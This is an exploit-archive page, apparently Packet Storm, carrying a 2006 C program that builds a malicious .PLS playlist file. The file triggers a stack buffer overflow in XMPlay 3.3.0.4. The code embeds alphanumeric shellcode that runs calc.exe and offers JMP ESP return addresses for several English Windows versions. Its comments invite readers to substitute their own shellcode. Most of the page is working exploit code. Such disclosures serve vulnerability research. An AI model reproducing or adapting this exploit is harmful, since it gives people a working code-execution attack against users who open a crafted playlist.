what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

xmplay-3.txt

xmplay-3.txt
Posted Nov 22, 2006
Authored by Greg Linares

XMPlay version 3.3.0.4 .PLS filename local/remote buffer overflow exploit that executes CALC.exe.

tags | exploit, remote, overflow, local
SHA-256 | 664a4d9eabb538139fee5820039e98298fdd81e7b0de9cc82fa0b27721b11935

xmplay-3.txt

Change Mirror Download
/*
===================================================================
0-day XMPlay 3.3.0.4 .PLS Filename Buffer Overflow Exploit
===================================================================
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when
loading malformed M3U and PLS files (probably ASX files as well -
working on the ASX Exploit as we speak).

This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)

===============
PLS Format
[playlist]
File1=C:\[BUFFER][JMP][SHELLCODE][NOPSLED][Extension]
Title1=title (could also be used for the buffer overflow exploit)

ESP Stores Address of Shellcode


Huge Greets and Thanks to Expanders (expanders[at]gmail[dot]com)
Who I presented the PoC and Discovery to for the original M3U exploit
He wrote the first PoC Exploit for it.

And Jerome Athias for some neat tools. Both of these
guys are very talented, keep up the good work.

Reported Exploit Date: 11/21/2006

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{

FILE *Exploit;
char buffer[512];
char *outp;

/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";



char NOPSled[50];
char tail[] = ".mid\r\n";
int JMP, x;

printf("\n======================================================================\n");
printf("XMPlay 3.3.0.4 and prior PLS Filename Buffer Overflow Exploit\n");
printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
printf("Usage: %s <output PLS file> <JMP> [Exploit Display Name] \n", argv[0]);
printf("\n JMP Options\n");
printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>\n");
printf("====================================================================\n\n\n");


if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
}


Exploit = fopen(argv[1],"w");
if ( !Exploit )
{
printf("\nCouldn't Open File!");
return 1;
}

memset(buffer, 0, 505);
memset(NOPSled, 0, 20);


fputs("[playlist]\r\n", Exploit);
fputs("File1=", Exploit);
fputs("C:\\", Exploit);

for (x=0;x<505;x++) {
strcat(buffer, "A");
}

fputs(buffer, Exploit);
if (atoi(argv[2]) <= 0) {
JMP = 1;
} else if (atoi(argv[2]) > 4) {
JMP = 1;
} else {
JMP = atoi(argv[2]);
}
switch(JMP) {
case 1:
printf("Using English Windows XP SP2 JMP...\n");
fputs("\xbc\x41\xdb\x77", Exploit);
break;
case 2:
printf("Using English Windows XP SP1 JMP...\n");
fputs("\xfc\x18\xd7\x77", Exploit);
break;
case 3:
printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
fputs("\xdc\x4a\xd7\x77", Exploit);
break;
case 4:
printf("Using English Windows 2000 SP 4 JMP...\n");
fputs("\x56\xc2\xe3\x77", Exploit);
break;
}

fputs(scode, Exploit);

for (x=0;x<20;x++) {
strcat(NOPSled, "\x90");
}

fputs(NOPSled, Exploit);
fputs(tail, Exploit);
if (strlen(argv[4]) > 0) {
fputs("Title1=", Exploit);
fputs(argv[4], Exploit);
fputs("\r\n", Exploit);
} else {
fputs("Title1=XMPlay_0-Day_PLS_Buffer_Overflow_Exploit_By_Greg_Linares\r\n", Exploit);
}

fputs("Length1=512", Exploit);

printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);


printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
printf("Greetz to: Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");

fclose(Exploit);
return 0;
}


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close